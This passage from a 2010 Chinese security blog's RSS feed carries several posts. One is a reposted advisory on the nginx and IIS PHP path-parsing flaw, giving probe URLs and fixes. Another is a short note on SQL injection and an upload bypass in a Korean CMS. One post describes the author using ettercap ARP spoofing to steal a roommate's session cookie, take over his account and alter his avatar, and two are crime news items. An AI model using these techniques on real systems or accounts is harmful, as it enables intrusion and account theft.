<p>mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞</p>
<p>mode=view&amp;number=</p>
<p>mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过，从而可以发布文章和上传文件。</p>
<p>打开一条记录，将mode=view直接改为write就可以上传了。</p>
<p>可能还存在其他的问题比如文件删除等，懒得看了。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>攻击教育部网站黑客被山东警方抓获</title>
		<link>http://www.0x50sec.org/%e6%94%bb%e5%87%bb%e6%95%99%e8%82%b2%e9%83%a8%e7%bd%91%e7%ab%99%e9%bb%91%e5%ae%a2%e8%a2%ab%e5%b1%b1%e4%b8%9c%e8%ad%a6%e6%96%b9%e6%8a%93%e8%8e%b7/</link>
		<comments>http://www.0x50sec.org/%e6%94%bb%e5%87%bb%e6%95%99%e8%82%b2%e9%83%a8%e7%bd%91%e7%ab%99%e9%bb%91%e5%ae%a2%e8%a2%ab%e5%b1%b1%e4%b8%9c%e8%ad%a6%e6%96%b9%e6%8a%93%e8%8e%b7/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 15:19:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[教育部，黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=907</guid>
		<description><![CDATA[芮城警方6月12日通报称，该局日前协助山东警方将一名藏匿在该县的网络&#8221;黑客&#8221;成功抓获，侦破了一起被公安部督办的入侵攻击教育部网站案件。 被抓获的网络&#8221;黑客&#8221;是22岁的男青年李某，毕业于西安市一家计算机专科学校。今年1月8日，教育部学位与研究生教育发展中心网站被侵入，&#8221;黑客&#8221; 大肆篡改了考试成绩数据，并借此伪造了大量2009年度工程硕士学位、学士学位等学历证书，通过变卖流入社会，造成极大危害。案发后，公安部责成山东警方全力侦办。 6月4日，山东警方查明犯罪嫌疑人李某藏身于芮城县，遂迅速赶赴该地抓捕。运城市公安局网警支队、芮城县公安局网警大队配合行动， 终于在6月6日早晨将李某抓获。警方随后查明，李某从2009年下半年起，多次与深圳、合肥、武汉、济南等地的&#8221;黑客&#8221;勾结在一起，联手攻击教育部网站， 入侵数据库篡改数据，伪造各种学历证书200余个，公共英语证书20余个，非法获利4万余元。 目前，此案已移交山东警方，李某已被刑事拘留。]]></description>
			<content:encoded><![CDATA[<p>芮城警方6月12日通报称，该局日前协助山东警方将一名藏匿在该县的网络&#8221;黑客&#8221;成功抓获，侦破了一起被公安部督办的入侵攻击教育部网站案件。</p>
<p>被抓获的网络&#8221;黑客&#8221;是22岁的男青年李某，毕业于西安市一家计算机专科学校。今年1月8日，教育部学位与研究生教育发展中心网站被侵入，&#8221;黑客&#8221; 大肆篡改了考试成绩数据，并借此伪造了大量2009年度工程硕士学位、学士学位等学历证书，通过变卖流入社会，造成极大危害。案发后，公安部责成山东警方全力侦办。  6月4日，山东警方查明犯罪嫌疑人李某藏身于芮城县，遂迅速赶赴该地抓捕。运城市公安局网警支队、芮城县公安局网警大队配合行动， 终于在6月6日早晨将李某抓获。警方随后查明，李某从2009年下半年起，多次与深圳、合肥、武汉、济南等地的&#8221;黑客&#8221;勾结在一起，联手攻击教育部网站， 入侵数据库篡改数据，伪造各种学历证书200余个，公共英语证书20余个，非法获利4万余元。</p>
<p>目前，此案已移交山东警方，李某已被刑事拘留。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e6%94%bb%e5%87%bb%e6%95%99%e8%82%b2%e9%83%a8%e7%bd%91%e7%ab%99%e9%bb%91%e5%ae%a2%e8%a2%ab%e5%b1%b1%e4%b8%9c%e8%ad%a6%e6%96%b9%e6%8a%93%e8%8e%b7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>网购交易申请被退款 警惕黑客骗术防不胜防</title>
		<link>http://www.0x50sec.org/%e7%bd%91%e8%b4%ad%e4%ba%a4%e6%98%93%e7%94%b3%e8%af%b7%e8%a2%ab%e9%80%80%e6%ac%be-%e8%ad%a6%e6%83%95%e9%bb%91%e5%ae%a2%e9%aa%97%e6%9c%af%e9%98%b2%e4%b8%8d%e8%83%9c%e9%98%b2/</link>
		<comments>http://www.0x50sec.org/%e7%bd%91%e8%b4%ad%e4%ba%a4%e6%98%93%e7%94%b3%e8%af%b7%e8%a2%ab%e9%80%80%e6%ac%be-%e8%ad%a6%e6%83%95%e9%bb%91%e5%ae%a2%e9%aa%97%e6%9c%af%e9%98%b2%e4%b8%8d%e8%83%9c%e9%98%b2/#comments</comments>
		<pubDate>Tue, 25 May 2010 05:16:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[网购]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=903</guid>
		<description><![CDATA[中新广东网5月22日电　(赖颖君) 随着网络日益普及，网购的群体日益壮大，特别是对于忙于上班的白领和忙于家庭琐事的主妇而言，网购，已经成为一种新的消费时尚。然而时日在网购的过程中，黑客陷阱无处不在。 “在淘宝买了东西然后再去看一场电影，谁知看完电影回来，发现在淘宝的数笔交易都显示退款了。这已经是第二次了！”在越秀区一外贸公司上班的小娟表示很诧异。小娟说，昨晚黑客又成功潜入自己的电脑，盗走她的淘宝账号，以申请退款为由转移他人交易，获取退款600元。“上个月淘宝账号被盗后，我就已经加强防范了，谁知还是防不胜防。” 幸好，当小娟发现自己的购物交易全被申请退款时，她及时与卖家联络查证，最终挽回了两笔正在协商退款的交易，而其他四笔交易则被黑客偷梁换柱。 第一次被黑客盗号退款，小娟当作是教训，而又一次被盗号，小娟则愤愤不平。“那个卖家也觉得诧异，问我为什么退款时，而我没回应。想不到原来是黑客搞的鬼。”她希望那些黑客们应该要用知识去创造财富，而不是去犯罪。同时，她也呼吁各位淘宝卖家受到退款信息后一定要电脑联系买主，而不要轻信阿里旺旺上的留言。 据不完全统计数据显示，2009年网购总金额约为2500亿元左右，面对如此大的消费市场，一些网络黑客利用网购技术陷阱，大肆骗取用户钱财。 有网购消费者表示，安全软件的不断升级，网银被盗的事情也在升级，黑客攻击的招数更层出不穷。即使网上有各种各类的网购防骗手册，但是所列出的防骗招数根本不足以应付技术越来越“恐怖”的黑客。 如何加强网购的安全防治呢？有从事多年计算机控制工作的高级工程师张先生则表示目前很难做到网络绝对安全。“平时上网尽量避开不正规的网站，一般这类网站经常被挂上木马；不要随意在网上发布个人资料，如电话号码、银行卡号、身份证号码等；及时查杀病毒，清理电脑垃圾，同时杀毒别忘了及时更新杀毒软件。” 网友支招：尽量用支付宝交易，收到货物后再确认付款。同时别忘了定期给电脑杀杀毒，倘若电脑病毒破坏了支付宝的安全性，支付页面会跳到虚假付款页面，最后不但收不到货，连钱也被黑客偷走，上演一场“狸猫换太子”。]]></description>
			<content:encoded><![CDATA[<p>中新广东网5月22日电　(赖颖君) 随着网络日益普及，网购的群体日益壮大，特别是对于忙于上班的白领和忙于家庭琐事的主妇而言，网购，已经成为一种新的消费时尚。然而时日在网购的过程中，黑客陷阱无处不在。</p>
<p>“在淘宝买了东西然后再去看一场电影，谁知看完电影回来，发现在淘宝的数笔交易都显示退款了。这已经是第二次了！”在越秀区一外贸公司上班的小娟表示很诧异。小娟说，昨晚黑客又成功潜入自己的电脑，盗走她的淘宝账号，以申请退款为由转移他人交易，获取退款600元。“上个月淘宝账号被盗后，我就已经加强防范了，谁知还是防不胜防。”</p>
<p>幸好，当小娟发现自己的购物交易全被申请退款时，她及时与卖家联络查证，最终挽回了两笔正在协商退款的交易，而其他四笔交易则被黑客偷梁换柱。<br />
<span id="more-903"></span><br />
第一次被黑客盗号退款，小娟当作是教训，而又一次被盗号，小娟则愤愤不平。“那个卖家也觉得诧异，问我为什么退款时，而我没回应。想不到原来是黑客搞的鬼。”她希望那些黑客们应该要用知识去创造财富，而不是去犯罪。同时，她也呼吁各位淘宝卖家受到退款信息后一定要电脑联系买主，而不要轻信阿里旺旺上的留言。</p>
<p>据不完全统计数据显示，2009年网购总金额约为2500亿元左右，面对如此大的消费市场，一些网络黑客利用网购技术陷阱，大肆骗取用户钱财。</p>
<p>有网购消费者表示，安全软件的不断升级，网银被盗的事情也在升级，黑客攻击的招数更层出不穷。即使网上有各种各类的网购防骗手册，但是所列出的防骗招数根本不足以应付技术越来越“恐怖”的黑客。</p>
<p>如何加强网购的安全防治呢？有从事多年计算机控制工作的高级工程师张先生则表示目前很难做到网络绝对安全。“平时上网尽量避开不正规的网站，一般这类网站经常被挂上木马；不要随意在网上发布个人资料，如电话号码、银行卡号、身份证号码等；及时查杀病毒，清理电脑垃圾，同时杀毒别忘了及时更新杀毒软件。”</p>
<p>网友支招：尽量用支付宝交易，收到货物后再确认付款。同时别忘了定期给电脑杀杀毒，倘若电脑病毒破坏了支付宝的安全性，支付页面会跳到虚假付款页面，最后不但收不到货，连钱也被黑客偷走，上演一场“狸猫换太子”。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e7%bd%91%e8%b4%ad%e4%ba%a4%e6%98%93%e7%94%b3%e8%af%b7%e8%a2%ab%e9%80%80%e6%ac%be-%e8%ad%a6%e6%83%95%e9%bb%91%e5%ae%a2%e9%aa%97%e6%9c%af%e9%98%b2%e4%b8%8d%e8%83%9c%e9%98%b2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>nginx文件类型错误解析漏洞</title>
		<link>http://www.0x50sec.org/nginx%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e9%94%99%e8%af%af%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://www.0x50sec.org/nginx%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e9%94%99%e8%af%af%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Mon, 24 May 2010 03:46:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[漏洞代码]]></category>
		<category><![CDATA[80sec]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[解析漏洞]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=901</guid>
		<description><![CDATA[nginx文件类型错误解析漏洞 来源:80sec.com 原文链接:http://www.80sec.com/nginx-securit.html 漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。 漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以 location ~ \.php$ { root html; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; include fastcgi_params; } 的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。 那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问 http://www.80sec.com/80sec.jpg/80sec.php 将会得到一个URI /80sec.jpg/80sec.php 经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为 /scripts/80sec.jpg/80sec.php 而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为 /scripts/80sec.jpg 所以不存在此问题。 后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为 /scripts/80sec.jpg和80sec.php 最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。 POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别： 访问http://www.80sec.com/robots.txt HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Thu, 20 May 2010 10:05:30 GMT Content-Type: text/plain Content-Length: 18 [...]]]></description>
			<content:encoded><![CDATA[<p>nginx文件类型错误解析漏洞<br />
来源:80sec.com<br />
原文链接:<a href="http://www.80sec.com/nginx-securit.html">http://www.80sec.com/nginx-securit.html</a></p>
<p>漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。</p>
<p>漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以<br />
<span id="more-901"></span><br />
location ~ \.php$ {<br />
root html;<br />
fastcgi_pass 127.0.0.1:9000;<br />
fastcgi_index index.php;<br />
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;<br />
include fastcgi_params;<br />
}</p>
<p>的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。<br />
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问</p>
<p>http://www.80sec.com/80sec.jpg/80sec.php</p>
<p>将会得到一个URI</p>
<p>/80sec.jpg/80sec.php</p>
<p>经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为</p>
<p>/scripts/80sec.jpg/80sec.php</p>
<p>而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为</p>
<p>/scripts/80sec.jpg</p>
<p>所以不存在此问题。<br />
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为</p>
<p>/scripts/80sec.jpg和80sec.php</p>
<p>最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。</p>
<p>POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：</p>
<p>访问http://www.80sec.com/robots.txt</p>
<p>HTTP/1.1 200 OK<br />
Server: nginx/0.6.32<br />
Date: Thu, 20 May 2010 10:05:30 GMT<br />
Content-Type: text/plain<br />
Content-Length: 18<br />
Last-Modified: Thu, 20 May 2010 06:26:34 GMT<br />
Connection: keep-alive<br />
Keep-Alive: timeout=20<br />
Accept-Ranges: bytes</p>
<p>访问访问http://www.80sec.com/robots.txt/80sec.php</p>
<p>HTTP/1.1 200 OK<br />
Server: nginx/0.6.32<br />
Date: Thu, 20 May 2010 10:06:49 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
Keep-Alive: timeout=20<br />
X-Powered-By: PHP/5.2.6</p>
<p>其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。</p>
<p>漏洞厂商：http://www.nginx.org</p>
<p>解决方案：</p>
<p>我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失</p>
<p>关闭cgi.fix_pathinfo为0</p>
<p>或者</p>
<p>if ( $fastcgi_script_name ~ \..*\/.*php ) {<br />
return 403;<br />
}</p>
<p>PS: 鸣谢laruence大牛在分析过程中给的帮助</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/nginx%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e9%94%99%e8%af%af%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IIS源码泄露及文件类型解析错误</title>
		<link>http://www.0x50sec.org/iis%e6%ba%90%e7%a0%81%e6%b3%84%e9%9c%b2%e5%8f%8a%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e8%a7%a3%e6%9e%90%e9%94%99%e8%af%af/</link>
		<comments>http://www.0x50sec.org/iis%e6%ba%90%e7%a0%81%e6%b3%84%e9%9c%b2%e5%8f%8a%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e8%a7%a3%e6%9e%90%e9%94%99%e8%af%af/#comments</comments>
		<pubDate>Mon, 24 May 2010 03:43:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[漏洞代码]]></category>
		<category><![CDATA[80sec]]></category>
		<category><![CDATA[IIS]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=898</guid>
		<description><![CDATA[来源：80sec.com 原文链接：http://www.80sec.com/iis-cgifastcgi-security-hol.html 漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持 asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP 的IIS服务器，特别是虚拟主机用户可能受的影响较大。 漏洞分析： IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。 黑盒访问 http://www.80sec.com/robots.txt/1.php 查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。 同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码 http://www.80sec.com/some.asp/1.php 漏洞厂商：http://www.microsoft.com 解决方案： 我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失 关闭cgi.fix_pathinfo为0]]></description>
			<content:encoded><![CDATA[<p>来源：80sec.com<br />
原文链接：<a href="http://www.80sec.com/iis-cgifastcgi-security-hol.html">http://www.80sec.com/iis-cgifastcgi-security-hol.html</a></p>
<p>漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持 asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP 的IIS服务器，特别是虚拟主机用户可能受的影响较大。</p>
<p>漏洞分析：<br />
IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。</p>
<p>黑盒访问</p>
<p>http://www.80sec.com/robots.txt/1.php</p>
<p>查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。<span id="more-898"></span></p>
<p>同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码</p>
<p>http://www.80sec.com/some.asp/1.php</p>
<p>漏洞厂商：http://www.microsoft.com</p>
<p>解决方案：</p>
<p>我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失</p>
<p>关闭cgi.fix_pathinfo为0</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/iis%e6%ba%90%e7%a0%81%e6%b3%84%e9%9c%b2%e5%8f%8a%e6%96%87%e4%bb%b6%e7%b1%bb%e5%9e%8b%e8%a7%a3%e6%9e%90%e9%94%99%e8%af%af/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>交换机环境下利用ettercap盗取cookie劫持校内网认证会话</title>
		<link>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/</link>
		<comments>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/#comments</comments>
		<pubDate>Mon, 24 May 2010 03:23:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[校内网]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=890</guid>
		<description><![CDATA[昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。 男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。 俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。 本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。 ettercap出场，贴图 利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接 查看会话校信息找到cookie 利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下]]></description>
			<content:encoded><![CDATA[<p>昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。</p>
<p>男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。</p>
<p>俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。</p>
<p>本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。</p>
<p>ettercap出场，贴图</p>
<p><span id="more-890"></span><a href="http://www.0x50sec.org/wp-content/uploads/2010/05/1.png"><img class="aligncenter size-medium wp-image-891" title="1" src="http://www.0x50sec.org/wp-content/uploads/2010/05/1-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">利用ettercap进行对目标arp欺骗以及嗅探<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/2.png"><img class="aligncenter size-medium wp-image-892" title="2" src="http://www.0x50sec.org/wp-content/uploads/2010/05/2-300x230.png" alt="" width="300" height="230" /></a>找到目标跟校内网的tcp连接<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/3.png"><img class="aligncenter size-medium wp-image-893" title="3" src="http://www.0x50sec.org/wp-content/uploads/2010/05/3-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">查看会话校信息找到cookie</p>
<p style="text-align: center;"><img class="aligncenter size-medium wp-image-894" title="23" src="http://www.0x50sec.org/wp-content/uploads/2010/05/23-294x300.png" alt="" width="294" height="300" /></p>
<p style="text-align: center;">利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
